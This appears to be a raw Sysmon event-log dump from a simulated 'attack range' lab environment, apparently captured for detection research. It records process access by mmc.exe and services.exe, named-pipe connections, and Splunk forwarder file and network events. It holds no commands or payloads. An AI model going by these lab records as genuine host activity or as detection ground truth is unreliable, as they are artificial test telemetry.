10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+5351a|C:\Windows\System32\SHELL32.dll+848f2|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11|C:\Windows\System32\mshtml.dll+112698 10341000x8000000000000000286019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6497|C:\Windows\System32\SHCORE.DLL+6387|C:\Windows\System32\SHCORE.DLL+62fd|C:\Windows\System32\SHCORE.DLL+620a|C:\Windows\System32\SHELL32.dll+d15fa|C:\Windows\System32\SHELL32.dll+84bc4|C:\Windows\System32\SHELL32.dll+84818|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 10341000x8000000000000000286018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6482|C:\Windows\System32\SHCORE.DLL+617d|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+d15e8|C:\Windows\System32\SHELL32.dll+84bc4|C:\Windows\System32\SHELL32.dll+84818|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158 10341000x8000000000000000286017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:23.052{C8EA50B7-0F2D-6216-C404-000000003802}1164580C:\Windows\system32\mmc.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.DLL+64c8|C:\Windows\System32\SHCORE.DLL+6154|C:\Windows\System32\SHCORE.DLL+5e3d|C:\Windows\System32\SHCORE.DLL+5dcf|C:\Windows\System32\SHCORE.DLL+5cd4|C:\Windows\System32\SHELL32.dll+d15e8|C:\Windows\System32\SHELL32.dll+84bc4|C:\Windows\System32\SHELL32.dll+84818|C:\Windows\System32\ieframe.dll+13f663|C:\Windows\System32\ieframe.dll+179fe0|C:\Windows\System32\ieframe.dll+68723|C:\Windows\System32\ieframe.dll+66e25|C:\Windows\System32\ieframe.dll+66b8a|C:\Windows\System32\ieframe.dll+64199|C:\Windows\System32\ieframe.dll+bf744|C:\Windows\System32\ieframe.dll+be283|C:\Windows\System32\ieframe.dll+7418c|C:\Windows\System32\ieframe.dll+7472c|C:\Windows\System32\ieframe.dll+7451d|C:\Windows\System32\ieframe.dll+74437|C:\Windows\System32\mshtml.dll+124158|C:\Windows\System32\mshtml.dll+123a11 23542300x8000000000000000286051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:24.583{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4780A73F9A3ED6CEFE8DE39132D396B3,SHA256=8A18B8FA466D37B2DA0BBE4E8AFEFEA222D736CE443B20458AA1171C7FF589AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:24.758{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D65A82FF3F6F6A6A63162117F50E266,SHA256=7328ADAE99BD0C7A862839F940A07261A790711C8B98976D4EB4305EFEBB36DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:22.683{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53293-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:25.774{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0FC60D32AF5D594FE8DD7E78F8709C5,SHA256=1EE67B3097F443460DC73835C01159A129B20E4696DABE74FA031D9ED5CFCCFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:25.598{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C194020AEF3A7176C9354C8018D98FC4,SHA256=1A0AF8295B2C04EB27579C53F9299A6654088E33AF2B0CCB3403C22AE0AA0FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:26.789{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E761B55582EBFA0001619F517E468FA,SHA256=00395B72616C90580049B9E79134D90DF8C3B7C6E9525936B2FFC36D4BC1B8B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:26.630{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9853FBE928C0A33A1E6B0909059F89D0,SHA256=3795C8A8DA919DF1DC1B784BEBC3F1591194D8CF72C6F77E12FA587B92B4F185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:27.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9E5379C2B676E95263E84202B16A21,SHA256=E30DB22FBFB89A96DE7D6839A0C5AECC1ACB4D9043CF179FC5F92275C21844EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:28.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72AEE14E2F1C5074D2197F5031A07C2C,SHA256=43004C70E84E8BFE1F2A62F4D6950CD368349D9739C8FDB182CEDAD44797D8BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:28.024{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F909893EF6094E797F6238815BADB208,SHA256=F90E3CEA8A7C2F7756D8798814F4FF0C6113E0322DF9696B3A1BC4B0DAB6A040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:29.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA3790DD05DA950E92650C2D190AFF8C,SHA256=0FF7BA9A663DBA04FBA2A7E76148AF2577522D969A7BFF833D2857805C39D5C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:26.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51229-false10.0.1.12-8000- 23542300x8000000000000000215010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:29.039{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F9816E7EF8AD26F053C705C73BC0F2,SHA256=40843B0F8E0D7A68CA2777034C394F220A262DC9872B97288315F588765BE597,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:28.620{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53294-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:30.723{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50984139BD5B0CAC0BB907D502186C98,SHA256=36892738E5471728098A74642A209812EAAA7875F14DFC71AEE69C5DD72B587A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:30.242{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1A06FD440F4C55EC3790B0E84335175E,SHA256=CD71DF17A0C5147F47BE989C48B7B94A1960F73D66794FE14C64E75E8A5F1D05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:30.055{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F81291CE0BB21F366F7236D1682694,SHA256=358A600AC35CA13931DE6AC43F1E99B6EE48DD37DDD3633B03D182800ED17C2A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:30.677{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:30.677{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:30.677{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:30.677{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000286057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:41:30.583{C8EA50B7-0F2D-6216-C404-000000003802}1164\scerpcC:\Windows\system32\mmc.exe 23542300x8000000000000000286064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:31.771{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843DE8DE06EE31028CE1A11726D2767A,SHA256=AA2E69C180E7EF02B167BB65425309E9EFD29BAD18BF5AC92F3D6BF88B6448DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:31.086{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0583DF2A5F5FF0E06F0702164ACBBF25,SHA256=58186E1142163260E20BEF78AA52A2361356554CF3E01EE77F8C7B3923A1B66D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:32.864{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=188EE53F618EC64B06D00AD46A668BEC,SHA256=DA7A3D89C971810159704415D056068FFA05A2BAAF085357AB746CE4B5FDACAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:32.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C9E1EE39293F949A5B8AF5D4A4B99E0,SHA256=04BA057A83A42F2EE788255ABD80F28F19C284489B2CE5FA3D7510047C90C352,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:33.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA923A333D4B1C176E0D6C2EEAC13A3C,SHA256=2C8C99A98B4276910DE9B1B26F6C6A93380B9BED8E90ED9804FE0D25309B1E3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:33.195{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10A10C7BA875A94B4359FF26DFBE3144,SHA256=1298C721C3DCCA2AE4D0F86B932D27D063022C053F2A51DD19B7ABE52175D1FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:33.302{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D55E60F9BFA2BC9716635C1B551DBDDD,SHA256=27F8FA799CBAD3A7BC80EEB1EED2E063BDC8E950F9F1B9CB1554ECF8FBBAAD45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:34.973{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60E01E657C04859EF82A001738F3E5C7,SHA256=9EC851123A4F5177B5C93DCE5B8373550F9EA303CD47F1F85F419F5316C528C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:34.211{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D83F326C48D85E1ABDC24AE87A6C4170,SHA256=6EC04F1E0D433EC5B7E23C34190831331F94E12B08CAA1A91CB09A5B65FC8814,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:31.603{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51230-false10.0.1.12-8000- 23542300x8000000000000000286069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:35.973{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBBE45062903509CD4998B6DCA89AD81,SHA256=1E7284B39F82E49A10A75FF810AF6F9F6DF8C214B0BB38D75502702C3B4F7306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:35.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC8166CA0DBA599B56FEBCD9F815DC9,SHA256=4BA7EE50EF92E69CF89435FA1BF6EDB305E26D357563A330DDE8A3A3DE2D242C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:36.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 